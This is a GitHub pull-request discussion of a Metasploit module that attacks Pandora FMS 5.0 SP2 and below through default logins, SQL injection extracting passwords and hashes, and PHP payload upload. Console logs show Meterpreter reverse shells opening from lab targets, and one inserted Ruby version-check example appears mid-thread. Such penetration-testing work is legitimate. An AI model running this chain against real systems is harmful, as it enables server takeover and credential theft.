
Added Pandora FMS RCE and SQLi module #2985

Merged
merged 1 commit into from Nov 26, 2014

Conversation

pyoor (Contributor) commented Feb 12, 2014

This is a corrected PR to replace PR #2979.

Remote Code Execution in Pandora FMS 5.0 SP2 and below (Tested on 4.0.2/4.1.1/5.0SP2 appliances).

How to replicate the vulnerable environment:

Download Pandora FMS 5.2 SP2: http://sourceforge.net/projects/pandora/files/Pandora%20FMS%205.0/FinalSP2/PandoraFMS5.0SP2-131226_64bit.iso/download

This module performs several steps in order to gain RCE. First, the module attempts to authenticate using default credentials. If this fails a SQL injection vulnerability affecting the mobile login form is exploited. Pandora FMS implements an "Auto login" hash which stores plaintext passwords in the database. Leveraging the SQLi, the plain-text password is extracted and used to authenticate. Once authenticated, this module will leverage the file manager functionality in order to upload a PHP payload.

If all methods fail the SQLi is leveraged in order to extract the admin MD5 password hash for offline cracking.

Using default credentials:

msf > use exploit/linux/http/pandorafms_sqli 
msf exploit(pandorafms_sqli) > show options

Module options (exploit/linux/http/pandorafms_sqli):

   Name       Current Setting    Required  Description
   ----       ---------------    --------  -----------
   PASS       pandora            no        The password to authenticate with
   Proxies                       no        Use a proxy chain
   RHOST                         yes       The target address
   RPORT      80                 yes       The target port
   TARGETURI  /pandora_console/  yes       The URI of the vulnerable Pandora FMS instance
   USER       admin              no        The username to authenticate with
   VHOST                         no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Pandora FMS version <= 5.0 SP2


msf exploit(pandorafms_sqli) > set RHOST 192.168.0.117
RHOST => 192.168.0.117
msf exploit(pandorafms_sqli) > exploit

[*] Started reverse handler on 192.168.0.134:4444 
[*] 192.168.0.117:80 - Attempting to authenticate using (admin:pandora)
[*] 192.168.0.117:80 - Successfully authenticated!
[*] 192.168.0.117:80 - Attempting to retrieve session cookie
[*] 192.168.0.117:80 - Successfully retrieved session cookie: PHPSESSID=8vulgtr2l7c38b7ev6kv1jlg27
[*] 192.168.0.117:80 - Attempting to inject payload
[*] 192.168.0.117:80 - Successfully injected payload
[*] Sending stage (39195 bytes) to 192.168.0.117
[*] Meterpreter session 1 opened (192.168.0.134:4444 -> 192.168.0.117:40361) at 2014-02-11 13:01:03 -0500
[*] 192.168.0.117:80 - Cleaning script remnants
[*] 192.168.0.117:80 - Script removed successfully

Using "Auto login" hash mechanism:

[*] Started reverse handler on 192.168.0.134:4444 
[*] 192.168.0.117:80 - Attempting to authenticate using (admin:badpassword)
[-] 192.168.0.117:80 - Authentication failed!
[*] 192.168.0.117:80 - Attempting to extract auto login hash
[*] 192.168.0.117:80 - Extracted auto login password (foobar123)
[*] 192.168.0.117:80 - Attempting to authenticate using (admin:foobar123)
[*] 192.168.0.117:80 - Successfully authenticated!
[*] 192.168.0.117:80 - Attempting to retrieve session cookie
[*] 192.168.0.117:80 - Successfully retrieved session cookie: PHPSESSID=hifh2b2vnscfjn196p8p4tskh3
[*] 192.168.0.117:80 - Attempting to inject payload
[*] 192.168.0.117:80 - Successfully injected payload
[*] Sending stage (39195 bytes) to 192.168.0.117
[*] Meterpreter session 2 opened (192.168.0.134:4444 -> 192.168.0.117:40362) at 2014-02-11 13:02:46 -0500
[*] 192.168.0.117:80 - Cleaning script remnants
[*] 192.168.0.117:80 - Script removed successfully

Resort to password extraction:

[*] Started reverse handler on 192.168.0.134:4444 
[*] 192.168.0.117:80 - Attempting to authenticate using (admin:badpassword)
[-] 192.168.0.117:80 - Authentication failed!
[*] 192.168.0.117:80 - Attempting to extract auto login hash
[-] 192.168.0.117:80 - No auto login password has been defined!
[*] 192.168.0.117:80 - Attempting to extract admin password hash
[*] 192.168.0.117:80 - Extracted admin password hash - [ 1da7ee7d45b96d0e1f45ee4ee23da560 ]
[-] Exploit failed: 192.168.0.117:80 - Unable to perform remote code execution!

@wchen-r7 (Contributor)

Thanks for the update. You're not actually replacing the current Pandora exploit, though. You're adding another one. It would make more sense to simply update the file in my opinion.

pyoor (Contributor, Author) commented Feb 12, 2014

@wchen-r7 Sorry, I'm confused. Has PR #2979 already been fully merged?
The reason I issued this PR is because #2979 showed 0 commits and I had already deleted that branch.

Also this PR includes the changes requested by @jlee-r7 and @jvazquez-r7

jlee-r7 (Contributor) commented Feb 12, 2014

@wchen-r7 no, this is a different bug.

@wchen-r7 (Contributor)

Ah ok. My bad.

jlee-r7 (Contributor) commented Feb 14, 2014

I have no idea what is up with #2979, but i'll take this one.

'uri' => normalize_uri(uri, "index.php")
})

if res && res.code == 200 and res.body =~ /Pandora FMS - the Flexible Monitoring System/ && res.body =~ /(?<=xx-small;">v)(.*?)(?=<\/td>)/

Don't use `and`. `&&` instead, please.

pyoor (Contributor, Author) commented Feb 17, 2014

Implemented @jlee-r7's requested changes in commit faae51f.

pyoor (Contributor, Author) commented Feb 21, 2014

@jlee-r7 Is everything good with the latest commit? I just wanted to make sure that I addressed all of your change requests.

Improvements for PandoraFMS SQLi module
@jvazquez-r7 (Contributor)

Thanks @pyoor! Waiting to hear from Travis and testing...

@jvazquez-r7 (Contributor)

The exploit looks like it is working:

msf exploit(pandorafms_sqli) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.137:80 - Attempting to authenticate using (admin:pandora)
[*] 192.168.172.137:80 - Successfully authenticated!
[*] 192.168.172.137:80 - Attempting to retrieve session cookie
[*] 192.168.172.137:80 - Successfully retrieved session cookie: PHPSESSID=6e66ucgkun60oqe8tlr9imd834;
[*] 192.168.172.137:80 - Attempting to upload payload
[*] 192.168.172.137:80 - Successfully uploaded payload
[*] Sending stage (39848 bytes) to 192.168.172.137
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.137:33137) at 2014-03-28 17:54:16 -0500
[*] 192.168.172.137:80 - Cleaning script remnants
[-] 192.168.172.137:80 - Could not identify file manager form!
[!] 192.168.172.137:80 - Failed to remove yFTyUBDf.php

meterpreter > ls

Listing: /var/www/html/pandora_console/images
=============================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  1381   fil   2014-03-28 11:52:54 -0500  AzbMMllu.php
100644/rw-r--r--  5615   fil   2013-12-25 19:12:19 -0600  MiniLogoArtica.jpg
100644/rw-r--r--  1440   fil   2013-12-25 19:12:19 -0600  add.disabled.png
100644/rw-r--r--  1437   fil   2013-12-25 19:12:19 -0600  add.png

but not the check method:

msf exploit(pandorafms_sqli) > check
[*] 192.168.172.137:80 - Cannot reliably check exploitability.

return Exploit::CheckCode::Unknown
end

if version && version <= "4.1.1"

Doesn't look consistent with the description, maybe a typo?
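The review comment above points at a string comparison of version numbers in the check method. As an added example (not the module's or the project's own code), the helper below extracts the version with the same regex the module applies to the login page and then compares it numerically, so that the `5.0SP2` format sorts where the PR description says it should; the HTML line and the `parse_version`/`vulnerable?` helpers are mine, and the `string_compare_vulnerable?` function reproduces the reviewed comparison to show where it goes wrong.

```ruby
# Added example: version extraction and comparison for a Pandora FMS check
# method. VERSION_RE is the regex from the reviewed module snippet; everything
# else is illustrative code written for this example, not the module's code.

VERSION_RE = /(?<=xx-small;">v)(.*?)(?=<\/td>)/

# Pull the version string (e.g. "5.0SP2", "4.1.1") out of the login page HTML.
def extract_version(html)
  m = VERSION_RE.match(html)
  m && m[1].strip
end

# Normalise "major.minor[.patch][SPn]" into [major, minor, patch, sp] so that
# 4.1.1 < 5.0 < 5.0SP1 < 5.0SP2 < 5.1 < 10.0. Returns nil on unparseable input.
def parse_version(str)
  m = /\A(\d+)\.(\d+)(?:\.(\d+))?(?:\s*SP(\d+))?\z/i.match(str.to_s.strip)
  return nil unless m
  [m[1].to_i, m[2].to_i, m[3].to_i, m[4].to_i] # nil.to_i == 0 fills gaps
end

# Last affected release per the PR description ("5.0 SP2 and below").
LAST_VULNERABLE = parse_version("5.0SP2")

# true/false for a recognised version; nil when the version cannot be parsed,
# which is the case where a check method should report Unknown.
def vulnerable?(version_str)
  v = parse_version(version_str)
  return nil if v.nil?
  (v <=> LAST_VULNERABLE) <= 0
end

# Plain string comparison, as in the reviewed snippet: "5.0SP2" is reported
# safe because "5" > "4", while "10.0" is reported affected because "1" < "4".
def string_compare_vulnerable?(version_str)
  version_str <= "4.1.1"
end

if __FILE__ == $0
  html = '<td style="font-size: xx-small;">v5.0SP2</td>' # constructed sample
  ver = extract_version(html)
  puts "detected #{ver}: numeric=#{vulnerable?(ver)} string=#{string_compare_vulnerable?(ver)}"
end
```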

@jvazquez-r7 (Contributor)

I would recommend changing the filename to be snake_case compliant:

git mv modules/exploits/linux/http/pandorafms_sqli.rb modules/exploits/linux/http/pandora_fms_sqli.rb 

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper

Looks like you're not using FileDropper, but cleaning up by yourself in cleanup.

@jvazquez-r7 (Contributor)

ping @pyoor, do you mind taking care of the comments please? Thanks!

@jvazquez-r7 (Contributor)

Looks like the author has abandoned this one :( I'm going to try to do the clean up myself, and hopefully land it.

@jvazquez-r7 jvazquez-r7 assigned jvazquez-r7 and unassigned jlee-r7 Nov 25, 2014
@jvazquez-r7 jvazquez-r7 merged commit b3f7447 into rapid7:master Nov 26, 2014
@jvazquez-r7 (Contributor)

Finished the PR by myself, see final result here: c82acfe

Thanks @pyoor for your submission. If you don't feel comfortable with any change in the landed version, please feel free to open a new pull request. I finished the clean up myself because it sat in the pull request queue for too long. Thanks!

Testing:
msf exploit(pandora_fms_sqli) > check
[*] 172.16.158.134:80 - The target appears to be vulnerable.
msf exploit(pandora_fms_sqli) > set VERBOSE true
VERBOSE => true
msf exploit(pandora_fms_sqli) > check

[*] 172.16.158.134:80 - Trying to detect installed version
[*] 172.16.158.134:80 - Pandora FMS 5.0SP2 found
[*] 172.16.158.134:80 - The target appears to be vulnerable.
msf exploit(pandora_fms_sqli) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.134:80 - Attempting to authenticate using (admin:pandora)
[*] 172.16.158.134:80 - Successfully authenticated!
[*] 172.16.158.134:80 - Attempting to retrieve session cookie
[*] 172.16.158.134:80 - Successfully retrieved session cookie: PHPSESSID=s1l1pc45m23jujmm46g64rm714;
[*] 172.16.158.134:80 - Uploading PHP payload...
[*] 172.16.158.134:80 - Attempting to upload payload YTDhlSEr.php...
[*] 172.16.158.134:80 - Successfully uploaded payload
[*] 172.16.158.134:80 - Executing payload...
[*] Sending stage (40551 bytes) to 172.16.158.134
[+] Deleted YTDhlSEr.php

meterpreter > getuid
Server username: apache (48)
meterpreter > exit
[*] Shutting down Meterpreter...
msf exploit(pandora_fms_sqli) > set USER badlogin
USER => badlogin
msf exploit(pandora_fms_sqli) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.134:80 - Attempting to authenticate using (badlogin:pandora)
[-] 172.16.158.134:80 - Authentication failed!
[*] 172.16.158.134:80 - Attempting to extract auto login hash via SQLi
[-] 172.16.158.134:80 - No auto login password has been defined!
[*] 172.16.158.134:80 - Attempting to extract admin password hash with SQLi
[+] 172.16.158.134:80 - Extracted admin password hash, unsalted md5 - [ 1da7ee7d45b96d0e1f45ee4ee23da560 ]
[-] Exploit failed [no-access]: 172.16.158.134:80 - Unable to perform remote code execution!
[*] Exploit completed, but no session was created.
